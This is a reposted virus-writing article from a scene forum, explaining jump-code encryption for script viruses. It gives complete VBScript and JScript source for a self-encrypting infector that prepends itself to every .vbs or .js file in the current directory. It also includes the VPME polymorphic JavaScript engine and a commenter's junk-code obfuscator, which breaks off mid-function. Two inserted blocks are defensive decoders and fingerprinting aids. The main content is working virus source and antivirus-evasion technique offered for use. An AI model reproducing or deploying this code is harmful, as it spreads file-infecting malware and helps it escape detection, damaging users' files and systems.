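[Repost] Self-encrypting script files (supplemented version)
Source: cvc
When we consider the number of encrypted macro viruses, it is surprising that there are not nearly as many encrypted script viruses. I have no good explanation for this; in any case, here I present a simple engine for encrypting VBScript and JScript files. The engine uses variable jump-code encryption with an oligomorphic decoder. The encryptor supports variable spacing, random variable names, random variable formation, random-case keywords (VBScript only), and variable jump code with a constant packet size, and it can be used recursively.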
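How is it done?
The difficulty in writing a self-encrypting script is that the decrypted source is itself what gets re-encrypted, so the problem is how to obtain the decrypted source code. There are two options. The first is to rebuild the source code at run time, but that is not always easy and we want a simple engine. The second is to decrypt the encrypted source code, but that is only easy while the structure is still weak (easy to find and easy to analyse). The second option is the one used here.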
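Jump code (constant)
Constant jump-code encryption is simple: in a string, every n-th character is a token, where n is the jump value of the code. In a plain string n=1, so every character of the string is a token. Encryption consists of increasing n and then filling the unused positions with random values.
First, n=1:
this is our string
Then n=2, with the unused tokens filled in here: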
!t!h!i!s! !i!s! !o!u!r! !s!t!r!i!n!g
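In VBScript this is implemented with the following code:
for i = n to len(s) step n
  d = d + mid(s, i, 1)
next
Or in JScript:
d = ""
for (i = n - 1; i < s.length; i += n)
  d = d + s.charAt(i)
Jump code (variable)
Variable jump-code encryption works the same way: every n-th byte of the string is a token, but here n can take a different value for each token. This is done by storing the characters in packets together with the value of n. The packet size p can be constant or variable. For example, here is a constant packet size of 3, with n as the first character of each packet. It looks like this: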
1t!2!h1i!2!s1 !2!i1s!2! 1o!2!u1r!2! 1s!2!t1r!2!i1n!2!g
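In this example, n varies between 1 and 2. In VBScript it is implemented with the following code:
for i = 1 to len(s) step p
  d = d + mid(s, i + mid(s, i, 1), 1)
next
And the equivalent JScript code:
d = ""
for (i = 0; i < s.length; i += p)
  d = d + s.charAt(i + (s.charAt(i) & 15))
"charAt(i) & 15" gives the same result as "charCodeAt(i) - 48" in fewer bytes.
A variable packet size can likewise be implemented by storing the packet size in the packet: each packet has the packet size p as its first character and n as its second.
It looks like this: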
32t!22h33!i22s32 !22i33!s22 32o!22u33!r22 32s!22t33!r22i32n!22g
In this example, p and n vary between 2 and 3. The following VBScript code implements this:
for i = 1 to len(s)
  d = d + mid(s, i + mid(s, i + 1, 1), 1)
  i = i + mid(s, i, 1)
next
And the equivalent JScript code:
d = ""
for (i = 0; i < s.length; i++)
{
  d = d + s.charAt(i + (s.charAt(i + 1) & 15))
  i = i + (s.charAt(i) & 15)
}
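The value of p (the one in mid(s, i, 1)) is one less than the actual packet size, because the for loop increments i automatically.
What then?
No matter how good the encryption is, the weak link is the decryptor. If the decryptor is very complex, or in some sense unique, nobody will bother with the encrypted code; they will simply work on the decryptor itself. In the scripting world encryption is easy, but using a very simple decryptor is a risk, because the one that has nothing to lose looks just like ours. Also, decoders can be layered, so that decoding takes a long time, and only the first layer is variable.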
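The three jump-code layouts described above can be decoded statically during analysis, without executing the sample. The following JavaScript is an added example and not part of the original article; the function names are illustrative, the first three strings are the article's own, and the fourth is constructed to exercise the char-code shift shown in the comments of the full listing (chr(asc(...)-ddddd)).

```javascript
// Added example: static decoders for the three jump-code layouts above.
// Nothing is evaluated; malformed input raises an error instead.

// Strings quoted from the article; each should decode to "this is our string".
const PAGE_CONSTANT = "!t!h!i!s! !i!s! !o!u!r! !s!t!r!i!n!g";
const PAGE_FIXED = "1t!2!h1i!2!s1 !2!i1s!2! 1o!2!u1r!2! 1s!2!t1r!2!i1n!2!g";
const PAGE_VARIABLE =
  "32t!22h33!i22s32 !22i33!s22 32o!22u33!r22 32s!22t33!r22i32n!22g";
// Constructed sample: "Hi" with each token's char code raised by its jump value.
const CONSTRUCTED_SHIFTED = "1Ix2xk";

// Read a key digit the way the article's JScript does (charAt(i) & 15),
// but reject anything that is not '1'..'9'.
function keyDigit(s, i, what) {
  const c = s.charCodeAt(i);
  if (!(c >= 0x31 && c <= 0x39)) {
    throw new RangeError(what + " at offset " + i + " is not a digit 1-9");
  }
  return c & 15;
}

// Constant jump code: every n-th character is a token.
function decodeConstantJump(s, n) {
  if (!Number.isInteger(n) || n < 1) throw new RangeError("n must be >= 1");
  let out = "";
  for (let i = n - 1; i < s.length; i += n) out += s.charAt(i);
  return out;
}

// Constant packet size p: [n][p-1 characters], token at offset n.
// shift=true also subtracts n from the token, as the listing's comments show.
function decodeFixedPackets(s, p, shift = false) {
  if (!Number.isInteger(p) || p < 2 || s.length % p !== 0) {
    throw new RangeError("input is not a whole number of " + p + "-char packets");
  }
  let out = "";
  for (let i = 0; i < s.length; i += p) {
    const n = keyDigit(s, i, "jump value");
    if (n >= p) throw new RangeError("jump value leaves packet at offset " + i);
    const code = s.charCodeAt(i + n);
    out += String.fromCharCode(shift ? code - n : code);
  }
  return out;
}

// Variable packet size: [p][n][...], p + 1 characters in total, token at offset n.
function decodeVariablePackets(s) {
  let out = "";
  for (let i = 0; i < s.length; ) {
    const p = keyDigit(s, i, "packet size");
    const n = keyDigit(s, i + 1, "jump value");
    if (n < 2 || n > p || i + p >= s.length) {
      throw new RangeError("malformed packet at offset " + i);
    }
    out += s.charAt(i + n);
    i += p + 1;
  }
  return out;
}

console.log(decodeConstantJump(PAGE_CONSTANT, 2));
console.log(decodeFixedPackets(PAGE_FIXED, 3));
console.log(decodeVariablePackets(PAGE_VARIABLE));
console.log(decodeFixedPackets(CONSTRUCTED_SHIFTED, 3, true));
```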
Let us look at the code. Only WSH v3+ is required, because no newer features are used. First, the VBScript version:
dim loff,newl
set fso=createobject("scripting.filesystemobject")
set file=fso.opentextfile(wscript.scriptfullname)
bann=file.readline
oldl=file.readline
file.close
randomize
dospc 1
rcase 8
v1=nvar
outch"("
v2=nvar
outch")" 'function aaaaa(bbbbb)
outch":"
rcase 3
v3=nvar
outch"="
outch"1"
rcase 2
rcase 3
outch"("
outv v2
outch")"
rcase 4
v5=mid(oldl,loff,1) 'old packet size
v6=int(rnd*7)+2 'new data size: 2-8
'if you do not use ! character, then line can be
'v6=int(rnd*7)+2 '1-8
outch cstr(v6+1) 'for ccccc=1 to len(bbbbb) step x
outch":"
v4=nvar
outch"="
rcase 4
outch"("
rcase 3
outch"("
outv v2
outch","
outv v3
outch","
outch"1"
outch")"
outch")" 'ddddd=cint(mid(bbbbb,ccccc,1))
outch":"
outv v1
outch"="
outv v1
outch"+"
rcase 3
outch"("
rcase 3
outch"("
rcase 3
outch"("
outv v2
outch","
outv v3
outch"+"
outv v4
outch","
outch"1"
outch")"
outch")"
outch"-"
outv v4
outch")" 'aaaaa=aaaaa+chr(asc(mid(bbbbb,ccccc+ddddd,1))-ddddd)
outch":"
rcase 4 'next
outch":"
rcase 3
rcase 8 'end function
outch":"
rcase 7
outch"("
outv v1
outch"("
outch chr(34)
cb=instr(mid(oldl,loff),chr(34))
for loff=loff to loff+cb-v5 step v5
oldkey=cint(mid(oldl,loff,1))
do
nkey=int(rnd*v6)+1
c=asc(mid(oldl,loff+oldkey,1))-oldkey+nkey
loop while c=34or c>127 'no " or 8-bit chars
newl=newl+cstr(nkey)
for kl=2to nkey
newl=newl+rchar
next
newl=newl+chr(c)
for kl=kl to v6
newl=newl+rchar
next
next
outch chr(34)
outch")"
outch")" 'execute(aaaaa("encrypted code"))
set dir=fso.getfolder(".") 'demo version, current directory only
for each item in dir.files
if lcase(fso.getextensionname(item))="vbs"then
err=0
set inf=fso.opentextfile(item,1) 'open potential victim
if err.number=0then
fst=inf.read(1) 'read first character
if fst<>"'"then 'check for infection marker
rest=inf.readall 'read entire file
attr=item.attributes 'save attributes
item.attributes=0 'remove any read-only attribute
err=0
set outf=fso.opentextfile(item,2) 'open file for writing
if err.number=0then
outf.writeline(bann) 'prepend banner
outf.writeline(newl) 'prepend code
outf.write(fst+rest) 'append first character and host
outf.close 'close file (write mode)
end if
item.attributes=attr 'restore attributes
end if
inf.close 'close file (read mode)
end if
end if
next
sub dospc(curoff) 'replace space with random number of spaces
if mid(oldl,curoff,1)=" "then
newl=newl+space(rnd*5+1)
while mid(oldl,curoff,1)=" "
curoff=curoff+1
wend
end if
loff=curoff
end sub
sub rcase(lineend) 'random case switch on keywords
for cb=loff to loff+lineend-1
newl=newl+chr(asc(mid(oldl,cb,1))xor(int(rnd*2)*32))
next
dospc loff+lineend
end sub
function rchar 'random case letter
rchar=chr(int(rnd*26)+65+int(rnd*2)*32)
end function
sub outv(tvar) 'variable followed by random number of spaces
newl=newl+tvar
dospc loff+instr(mid(oldl,loff)," ")-1
end sub
function nvar 'random sequence of random case letters
while tv=v1 or tv=v2 or tv=v3 or tv=v4
tv=""
for cb=1to rnd*5+5 '5-9 characters
tv=tv+rchar
next
wend
outv tv
nvar=tv
end function
sub outch(ch) 'character followed by random number of spaces
newl=newl+ch
dospc loff+1
end sub
Now the JScript version.
//Conscrypt - roy g biv 01/02/03
fso=new ActiveXObject("scripting.filesystemobject")
with(inf=fso.opentextfile(WScript.scriptfullname))
{
bann=readline()
oldl=readline()
close()
}
Math.random(1)
newl=""
dospc(0)
outv("function")
var v1=nvar(),v2,v3,v4,v5
outch("(")
v2=nvar()
outch(")") //function aaaaa(bbbbb)
outch("{ ")
v3=nvar()
outch("=")
outv("\"\"") //ccccc=""
outch(";")
outv("for")
outch("(")
v4=nvar()
outch("=")
outch("0")
outch(";")
outv(v4)
outch("<")
outv(v2)
outch(".")
outv("length")
outch(";")
outv(v4)
outv("+=")
v6=oldl.charAt(loff) //old packet size
v7=(Math.random()*7+2)&15 //new data size: 2-8
//if you do not use ! character, then line can be
//v7=(Math.random()*8+1)&15 //1-8
outch(v7+1)
outch(")") //for(ddddd=0;ddddd<bbbbb.length;ddddd+=x)
outch("{ ")
v5=nvar()
outch("=")
outv(v2)
outch(".")
outv("charAt")
outch("(")
outv(v4)
outch(")")
outch("&")
outv("15") //eeeee=bbbbb.charAt(ddddd)&15
outch(";")
outv(v3)
outv("+=")
outv("String")
outch(".")
outv("fromCharCode")
outch("(")
outv(v2)
outch(".")
outv("charCodeAt")
outch("(")
outv(v4)
outch("+")
outv(v5)
outch(")")
outch("-")
outv(v5)
outch(")") //ccccc+=String.fromCharCode(bbbbb.charCodeAt(ddddd+eeeee)-eeeee)
outch(" }")
outv("return")
outv(v3) //return ccccc
outch(" }")
outv("eval")
outch("(")
outv(v1)
outch("(")
outch('"')
for(ss=loff+oldl.substr(loff).search(/"/);loff<ss;loff+=v6&15)
{
oldk=oldl.charAt(loff)&15
do
{
nkey=(Math.random()*v7+1)&15
cca=oldl.charCodeAt(loff+oldk)-oldk+nkey
}
while(cca==34||cca==92||cca>127) //no " or \ or 8-bit chars
newl+=nkey
kl=0
while(++kl<nkey)
newl+=rchar()
newl+=String.fromCharCode(cca)
while(kl++<v7)
newl+=rchar()
}
outch('"')
outch(")")
outch(")") //eval(aaaaa("encrypted code"))
for(enu=new Enumerator(fso.getfolder(".").files);!enu.atEnd();enu.moveNext())
//demo version, current directory only
if(fso.getextensionname(item=enu.item()).toLowerCase()=="js")
try
{
with(inf=fso.opentextfile(item,1)) //open potential victim
{
fst=read(1) //read first character, keep for later
if(fst!="/") //check for infection marker
try
{
rest=readall() //read entire file
attr=item.attributes //save attributes
item.attributes=0 //remove any read-only attribute
with(outf=fso.opentextfile(item,2)) //open file for writing
{
writeline(bann) //prepend banner
writeline(newl) //prepend code
write(fst+rest) //append first character and host
close() //close file (write mode)
}
item.attributes=attr //restore attributes
}
catch(z)
{
}
close() //close file (read mode)
}
}
catch(z)
{
}
function dospc(coff) //replace space with random number of spaces
{
if(oldl.charAt(coff)==" ")
{
cb=0
while(cb++<=Math.random()*5)
newl+=" "
while(oldl.charAt(coff)==" ")
++coff
}
loff=coff
}
/* JScript is case-sensitive so this function is not used
function rcase(lend) //random case switch on keywords
{
for(cb=loff;cb<loff+lend;cb++)
newl+=String.fromCharCode(oldl.charCodeAt(cb)^(Math.round(Math.random())*32))
dospc(loff+lend)
}
*/
function rchar() //random case letter
{
with(Math)return String.fromCharCode(random()*26+65+round(random())*32)
}
function outv(tvar) //variable or keyword followed by random number of spaces
{
newl+=tvar
dospc(loff+oldl.substr(loff).search(/ /))
}
function nvar() //random sequence of random case letters
{
do
{
tv=""
cb=0
while(++cb<Math.random()*5+6) //5-9 characters
tv+=rchar()
}
while(tv==v1||tv==v2||tv==v3||tv==v4||tv==v5)
outv(tv)
return tv
}
function outch(ch) //character followed by random number of spaces
{
newl+=ch
dospc(loff+1)
}
Thanks to the following friends (A-Z):
Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel -
The Gingerbread Man - Ultras - Vecna - VirusBuster - Whitehead
rgb/morning of 29 February 2003
iam_rgb@hotmail.com
Another article:
http://www.retcvc.com/cgi-bin/topic.cgi?forum=12&topic=26&show=0
/****************************************************************************
javascript Poly/Meta Engine (VPME)
By Vancheer/CVC
This code is only for study purpose, I don't take any responsibility for any
malicious effect if you use this code in your virus.
Welcome to my first javascript virus related work. I had an eventual chance
to use JS, then I found JS is such a powerful language, so I decided to write
something with it.
Following is a little description on this engine.
1, This engine is written as a javascript object, so to use it, you should
know how JS OOP works. I've seen in the books that says JS is only object-based
or instance-based, not really object-oriented, but I don't think so. I think
it's easy to write beautiful OOP code by using JS.
2, How does this engine work?
Unlike the other script poly engines which encode the main code as a string,
VPME doesn't need a code string. Instead of that, it directly encodes its own
body.
When doing poly, it will first do a simple meta. It will replace the space(20h),
tabs(09h) and returns(0dh) by a random number of spaces and tabs, this can make
every piece of code have a random offset. Then VPME will replace all variables
which are prefixed by an underline('_') with a random string. Besides that, it will
replace all numbers with a random radix, e.g., 11 may be replaced by 0xb or 013.
So to help VPME do the meta, you should put a space anywhere it's possible and
prefix the variables with an underline.
It's not difficult to parse the JS syntax to distinguish the variable name, but
it will cost more code to do so. So it's not bad to use a prefix to indicate the
variable name.
After the simple meta, VPME then encrypts the code and generates some decryption
code, the decryption code is not very random.
3, How to use VPME?
It's rather simple to use it. What you should do is only to write your own code
in the _run() function. Note, you mustn't put any code out of _main(), you
should write every thing(global variables and functions) in _main(). In _run()
function, to create a new generation, you only need to new a _main object, then
call its _encode() function, that function will return the new code. Then you
can write the return string in the <body> element, and it will be decrypted and
_run() will be called automatically.
Of course you should remove all comment if you use this code in your virus.
4, VPME's disadvantage and potential bugs.
A, The code is a little big, the engine size will be about 12-13K in the generations.
B, The decryption code is not very random.
C, It's very slow to do the poly, so you'd better only create one generation
when your virus runs.
D, It can't hide from N*** if you use some malicious object, eg, fso. I think
N*** and IE will warn when they meet the call to an object, not only parse the
script code, so poly is useless for this.
E, It's not tested carefully.
****************************************************************************/
function _main()
{
this._run = function( ) {
/*Write your code here*/
/*Following code is only a sample, you should replace it with your own code.
The sample will write the new generation to e:\ with a 'random' file name as
a hta file, then you can run that hta alone*/
var _fso = new ActiveXObject("Scripting.FileSystemObject") ;
var _date = new Date() ;
var s = "E:\\" + _date.getTime() + ".hta" ;
var _f = _fso.CreateTextFile( s, true ) ;
var _m = new _main() ;
s = _m._encode() ;
s = "<html><head><HTA:APPLICATION BORDER=\"none\" CAPTION=\"no\" SHOWINTASKBAR=\"no\" SINGLEINSTANCE=\"yes\" SYSMENU=\"no\" WINDOWSTATE=\"minimize\"><body><script language=\"javascript\">" + s + "</script></body></html>" ;
_f.write(s);
_f.close();
/*Write your code end*/
}
this._symbolNames = new Array( ) ;
this._polyNames = new Array( ) ;
this._one = 1 ;
this._underLine = '\x5f' ;
this._polyString = "" ;
this._decryptString = "" ;
this._decryptFuncName = "" ;
this._stringName = "" ;
this._keyString = ";+-=,_[]{ }()<>.|&" ;
this._getRand = function( _max ) {
return Math.floor( Math.random() * _max );
}
this._isBlank = function( _ibc ) {
return ( ' ' == _ibc ) || ( '\t' == _ibc ) || ( '\r' == _ibc );
}
this._isDigit = function( _idc , _idis16 ) {
_xidc = _idc.toLowerCase( ) ;
return ( _xidc >= '0' && _xidc <= '9' ) || ( _idis16 && ( _xidc >= "a" && _xidc <= "f" ) );
}
this._isSymbolChar = function( _scc ) {
return ( this._underLine == _scc ) || this._isDigit( _scc , false ) || ( _scc >= 'a' && _scc <= 'z' ) || ( _scc >= 'A' && _scc <= 'Z' ) ;
}
this._findInArray = function( _arr , _ele ) {
var _aindex ;
for( _aindex = 0 ; _aindex < _arr.length ; _aindex = _aindex + this._one )
if( _arr[ _aindex ] == _ele || _arr[ _aindex ].search( new RegExp( _ele ) ) >= 0 || _ele.search( new RegExp( _arr[ _aindex ] ) ) >= 0 ) return _aindex ;
return -1 ;
}
this._getRandString = function( ) {
var _grs = this._underLine ;
var _gindex ;
var _grsrnd ;
var _grsc ;
for( _gindex = 0 ; _gindex < 2 + this._getRand( 3 ) ; _gindex = _gindex + this._one) {
_grsrnd = this._getRand( 4 );
if( 0 == _grsrnd )
_grsc = 0x30 + this._getRand(9) ;
else {
if( 1 == _grsrnd ) _grsc = 0x41 + this._getRand(26) ;
else _grsc = 0x61 + this._getRand(26) ;
}
_grs = _grs + String.fromCharCode( _grsc );
}
return _grs ;
}
this._convertString = function( _constr ) {
var _conrs = "";
var _coni ;
var _conc ;
for( _coni = 0 ; _coni < _constr.length ; _coni = _coni + this._one ) {
_conc = _constr.charAt( _coni ) ;
if( '\x22' == _conc ) _conrs = _conrs + "\\\"" ;
else if( '\x27' == _conc ) _conrs = _conrs + "\\\'" ;
else if( '\x0a' == _conc ) _conrs = _conrs + "\\n" ;
else if( '\\' == _conc ) _conrs = _conrs + "\\\\" ;
else _conrs = _conrs + _conc ;
}
return _conrs ;
}
this.getRandNumber = function( _rn ) {
var _rnret , _rnd2;
if( _rn.charAt( 0 ) == '0' && _rn.length > 1 ) {
_rnret = _rn.charAt( 1 ) ;
if( 'x' == _rnret || 'X' == _rnret )
_rnret = parseInt( _rn.substring( 2 ) , 16 );
else
_rnret = parseInt( _rn.substring( 1 ) , 8 );
}
else
_rnret = parseInt( _rn , 10 );
_rnd2 = this._getRand( 3 ) ;
if( 0 == _rnd2 ) _rnret = "0" + _rnret.toString( 8 ) ;
else { if( 1 == _rnd2 ) _rnret = "0x" + _rnret.toString( 16 ) ;
else _rnret = _rnret.toString( 10 ) ; }
return _rnret ;
}
this._poly = function( _code ) {
var _i , _j ;
var _c , _t ;
var _s = "" ;
var _is16 ;
this._symbolNames.length = 0 ;
this._polyNames.length = 0 ;
for( _i = 0 ; _i < _code.length ; _i = _i + this._one ) {
_c = _code.charAt( _i ) ;
if( this._isBlank( _c ) ) {
while( this._isBlank( _code.charAt( _i ) ) && ( _i < _code.length - this._one ) )
_i = _i + this._one ;
if( !this._isBlank( _code.charAt( _i ) ) )
_i = _i - this._one ;
for( _j = 0 ; _j <= this._getRand( this._one * 5) + this._one ; _j = _j + this._one)
if( this._getRand( this._one * 2) == 0 )
_s = _s + ' ' ;
else
_s = _s + '\t' ;
}
else {
if( this._isDigit( _c ) && this._isBlank( _s.charAt( _s.length - this._one ) ) ) {
_t = "";
_is16 = false ;
while( ( this._isDigit( _c , _is16 ) || "x" == _c || "X" == _c ) && ( _i < _code.length - this._one ) ) {
if( "x" == _c || "X" == _c ) _is16 = true ;
_t = _t + _c ;
_i = _i + this._one ;
_c = _code.charAt( _i ) ;
}
_i = _i - this._one ;
_s = _s + this.getRandNumber( _t ) ;
}
else {
if( "\"" == _c || "'" == _c ) {
_s = _s + _c;
while( _i < ( _code.length - this._one ) ) {
_i = _i + this._one ;
_t = _code.charAt( _i ) ;
_s = _s + _t ;
if( "\\" == _t) {
_i = _i + this._one ;
_s = _s + _code.charAt( _i ) ;
}
if( _t == _c ) break ;
}
}
else {
if( this._underLine == _c) {
_s = _s + _c ;
if(!this._isSymbolChar( _code.charAt( _i - 1) ) ) {
var _sym = this._underLine ;
_i = _i + this._one;
while( this._isSymbolChar( _code.charAt( _i ) ) && _i < ( _code.length - this._one ) ) {
_t = _code.charAt( _i ) ;
_s = _s + _t;
_sym = _sym + _t;
_i = _i + this._one;
}
if( this._findInArray( this._symbolNames , _sym ) < 0 )
this._symbolNames[this._symbolNames.length] = _sym ;
if( !this._isSymbolChar( _code.charAt( _i ) ) )
_i = _i - this._one;
}
}
else
_s = _s + _c ;
}
}
}
}
for( _i = 0 ; _i < this._symbolNames.length ; _i = _i + this._one ) {
_t = this._getRandString( ) ;
_j = 0 ;
while( _j < 50 && ( this._findInArray( this._symbolNames, _t ) >= 0 || this._findInArray( this._polyNames, _t ) >= 0 ) ) {
_t = this._getRandString( ) ;
_j = _j + this._one ;
}
if( _j >= 5 ) _t = "" ;
this._polyNames[this._polyNames.length] = _t ;
if( _t != "" ) {
var _regexp = new RegExp( this._symbolNames[ _i ] ) ;
var _rr = _s ;
for( _j = 0 ; _j < 1000 ; _j = _j + this._one ) {
_rr = _rr.replace( _regexp, _t ) ;
if( _rr == _s ) break;
_s = _rr ;
}
}
}
return _s ;
}
this._encrypt = function( _str ) {
var _es = "" ;
var _ei , _er ;
var _ks = "" ;
var _ec ;
var _kstr = "" ;
for( _ei = 0x61 ;_ei <= 0x7a ; _ei++ ) _kstr = _kstr + String.fromCharCode( _ei ) ;
for( _er = 0x41 ;_er <= 0x5a ; _er++ ) _kstr = _kstr + String.fromCharCode( _er ) ;
for( _ec = 0x30 ;_ec <= 0x39 ; _ec++ ) _kstr = _kstr + String.fromCharCode( _ec ) ;
_kstr = _kstr + this._keyString ;
for ( _ei = 0 ; _ei < 100 ; _ei = _ei + this._one ) {
_er = this._getRand( _kstr.length ) ;
if( _ks.indexOf( _kstr.charAt( _er ) ) < 0 )
_ks = _ks + _kstr.charAt( _er ) ;
}
for ( _ei = 0 ; _ei < _kstr.length ; _ei = _ei + this._one ) {
if( _ks.indexOf( _kstr.charAt( _ei ) ) < 0 )
_ks = _ks + _kstr.charAt( _ei ) ;
}
for( _ei = _str.length - 1 ; _ei >= 0 ; _ei = _ei - this._one ) {
_ec = _str.charAt( _ei ) ;
_er = _ks.indexOf( _ec ) ;
if( _er >= 0 ) _ec = _kstr.charAt( _er ) ;
_es = _es + _ec ;
}
this._decryptFuncName = this._getRandString( ) ;
this._decryptString = this._poly( "( _str ) { var _es = \"\" , _ks = \"" + _ks + "\" , _key =\"\", _sk = \"" + this._keyString + "\" ; var _ei , _er , _ec; for( _ei = 0x61 ;_ei <= 0x7a ; _ei++ ) _key = _key + String.fromCharCode( _ei ) ; for( _er = 0x41 ;_er <= 0x5a ; _er++ ) _key = _key + String.fromCharCode( _er ) ; for( _ec = 0x30 ;_ec <= 0x39 ; _ec++ ) _key = _key + String.fromCharCode( _ec ) ; _key = _key + _sk ; for( _ei = _str.length - 1 ; _ei >= 0 ; _ei-- ) { _ec = _str.charAt( _ei ) ; _er = _key.indexOf( _ec ) ; if( _er >= 0 ) _ec = _ks.charAt( _er ) ; _es = _es + _ec ; } return _es; }" ) ;
this._decryptString = "function " + this._decryptFuncName + this._decryptString;
return _es ;
}
this._encode = function( ) {
var _ni = new String( _main ) ;
_ni = _ni + "\n ( new _main( ) )._run( ) ;" ;
this._stringName = this._getRandString( ) ;
this._polyString = this._poly( _ni ) ;
this._polyString = "var " + this._stringName + " = \"" + this._convertString( this._encrypt( this._polyString ) ) + "\";" ;
return this._decryptString + "\n" + this._polyString + "\n eval(" + this._decryptFuncName + "(" + this._stringName +"));" ;
}
}
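For detection work, the cosmetic changes described in the VPME header (random blanks, renamed '_' variables, re-based integers) can be undone so that different generations of the same code compare equal. The following JavaScript is an added example and not part of VPME; the function names and the two sample stubs are constructed for illustration.

```javascript
// Added example, not VPME code. It canonicalises the three cosmetic changes
// the header comment lists: blank runs, '_' identifiers, integer radix.
// Assumption: the input has no regex literals or comments containing quotes.
const TOKEN = /("(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')|(\b_[A-Za-z0-9_]*)|(\b0[xX][0-9a-fA-F]+\b|\b[0-9]+\b)|([ \t\r\n]+)/g;

// Integer literal in any of the three spellings the engine emits.
function parseJsInt(text) {
  if (/^0[xX]/.test(text)) return parseInt(text.slice(2), 16);
  if (/^0[0-7]+$/.test(text)) return parseInt(text, 8); // legacy octal: 013 is 11
  return parseInt(text, 10);
}

// maskStrings=true empties string literals, for stubs that embed a random key.
function normalize(code, maskStrings = false) {
  const names = new Map(); // original name -> _v0, _v1, ... in order of first use
  return code.replace(TOKEN, (m, str, ident, num) => {
    if (str !== undefined) return maskStrings ? str[0] + str[0] : str;
    if (ident !== undefined) {
      if (!names.has(ident)) names.set(ident, "_v" + names.size);
      return names.get(ident);
    }
    if (num !== undefined) return String(parseJsInt(num));
    return " "; // any run of blanks becomes one space
  }).trim();
}

// FNV-1a (32-bit) over the UTF-16 code units of the normalised text.
function fingerprint(code, maskStrings = false) {
  const text = normalize(code, maskStrings);
  let h = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    h ^= text.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h.toString(16).padStart(8, "0");
}

// Constructed samples: the same stub in two "generations" that differ in
// blanks, identifier names, integer radix and the embedded key string.
const STUB_A = 'function _x1 ( _s ) { var _k = "qwe" ; for( _i = 0x61 ; _i <= 0172 ; _i++ ) _k = _k + _s ; }';
const STUB_B = 'function\t_Zz9 (  _p0 ) { var _m = "asd" ;\tfor( _e = 97 ; _e <= 0x7a ; _e++ ) _m = _m + _p0 ; }';

console.log(normalize(STUB_A, true));
console.log(fingerprint(STUB_A, true) === fingerprint(STUB_B, true));
```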
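My addition: [冰狐浪子]
//'.' is the decimal point//
//'-' appears in floating-point values 1e-4, 1.0e-4//
//i++;i-- must not be split apart//
//i ++//the space must not be turned into a line break, etc.
//for( _i = 0 ; _i < _code.length ;_i++ )// no _bx0(9) after the ; sign
//switch (Math.floor(Math.random()*_num)) { //no _bx0(9) after the { sign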
function bx( _code ) {
var _a,_b,_c ,_d;
var _i;
var _s = '';
for( _i = 0 ; _i < _code.length ;_i++ ) {
_c = _code.charAt( _i ) ;
_d = _code.charAt(_i+1) ;
_b=_c+_d;
//comment contents are left unchanged
if(_b=='/*') {
_s += _b;++_i;
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i ) ;
_d = _code.charAt( _i+1 ) ;
_b=_c+_d;
_s += _c ;
if( _b =='*/' ) { ++_i;_s += _d;break ; }
}
continue;
}
if(_b=='//') {
_s += _b;_i++;
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i ) ;
_s += _c ;
if( _c == '\r'||_c == '\n') break ;
}
continue;
}
//contents inside quotes are left unchanged
//transform: wrap the quoted string in parentheses (), e.g. ("h")
if( _c =='"' || _c == '\'' ) {
/*_s += _c;*/
_s +="("+ _c;
while( _i < _code.length -1 ) {
_d = _code.charAt( ++_i ) ;
_s += _d ;
if( '\\' == _d) { _s += _code.charAt( ++_i ) ; }
if( _d == _c ) { _s +=")";/**/break ; }
}
continue;
}
//regular expression contents are left unchanged//filter out regular expressions, e.g. re = /"" abc /gim;
if( _c == '/') {
_a=_i;_b = _s;_s += _c;
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i ) ;
if( _c == '\r'||_c == '\n'||_i==(_code.length -1) ) { _s=_b+_bx0(5)+'/';if(_d != '=') { _s += _bx0(5); }_i=_a;break ; }//not a regular expression /*so it is a division sign; transform it here*/ /*_s=_b+'/';*/
_s += _c ;
if( '\\' == _c) { _s += _code.charAt( ++_i ); }
if( _c == '/' ) {
while( _i < _code.length -1 ) {
_c = _code.charAt( ++_i );
if('gim'.indexOf(_c)>= 0) { _s += _c ;continue; }
_s +=_bx0(5);//transform: here _s may have (\r, \n, space, Tab, comment) appended
--_i;break;
}
break;
}
}
continue;
}
//transformations
if('!%*^&+-<>|()[],.:?~={ }; \t\r\n'.indexOf(_c)>= 0){
//transform !%*^
if('!%*^'.indexOf(_c)>= 0) {
_s += _bx0(5) +_c;
if(_d != '=') { _s += _bx0(5); }
continue;
}
//transform +-
//'-' appears in floating-point values 1e-4, 1.0e-4//
//i++;i-- must not be split apart//
if('+-'.indexOf(_c)>= 0) {
if( _d !=_c && _d != '=') _s += _c + _bx0(5);
else _s += _c;
continue;
}
//transform &<>|
if('&<>|'.indexOf(_c)>= 0) {
if( _s.charAt(_s.length-1) !=_c ) _s += _bx0(5);
if( _d !=_c && _d != '=') _s += _c + _bx0(5);
else _s += _c;
continue;
}
//transform .
//'.' is the decimal point//
if(_c=='.') { _s += _c ;continue; }
//transform ()[],:?~
//'.' is the decimal point//
if('()[],:?~{ ;'.indexOf(_c)>= 0) { _s += _bx0(5) +_c + _bx0(5);continue; }
//transform =
if(_c == '=') {
if( '!%&*+-/<=>^|'.indexOf( _s.charAt(_s.length-1) )< 0 ) _s += _bx0(5);
if(_d != '=') _s += _c + _bx0(5);
else _s += _c;
continue;
}
// transform }
if(_c==' }') {
_s += _bx0(5) + _c + _bx0(9);
continue;
}
//space and horizontal tab (Tab)
if(' ' == _c || '\t' == _c){
_s += Math.random()>0.5?' ':'\t'
continue;
}
//carriage return and line feed
if('\r' == _c || '\n' == _c ){
_s += _bx0(5) + _bx1(4) + _bx0(5);
continue;
}
}
//end of transformations
//everything else
_s += _c ;
}
return _s;
}
//_bx0(5)_bx0(9)
function _bx0(_num)
{
//randomly generate \r \n \n\r \r\n space \t //comment(\r or \n) /*comment*/ *5*9
var _bx="";
switch (Math.floor(Math.random()*_num)) {
case 0:
_bx=_bx1(4);break;
case 1:
_bx=' ';break;
case 2:
_bx='\t';break;
case 3:
_bx='//注释'+_bx1(4);break;
case 4:
_bx='/*注释*/';break;
case 5:
_bx=(Math.random()>0.5?'"字符串"':"'字符串'")+_bx1(5);break;
case 6:
_bx=_bx2(999)+_bx1(5);break;//number
case 7:
_bx='{ }';break;
case 8:
_bx='(0);';break;//_bx='(0)'+_bx1(5);
case 9:
_bx='[];';break;//_bx='[]'+_bx1(5);
case 10:
_bx='1==1;';break;//useless statement//_bx='1==1'+_bx1(5);
default :
_bx='';
}
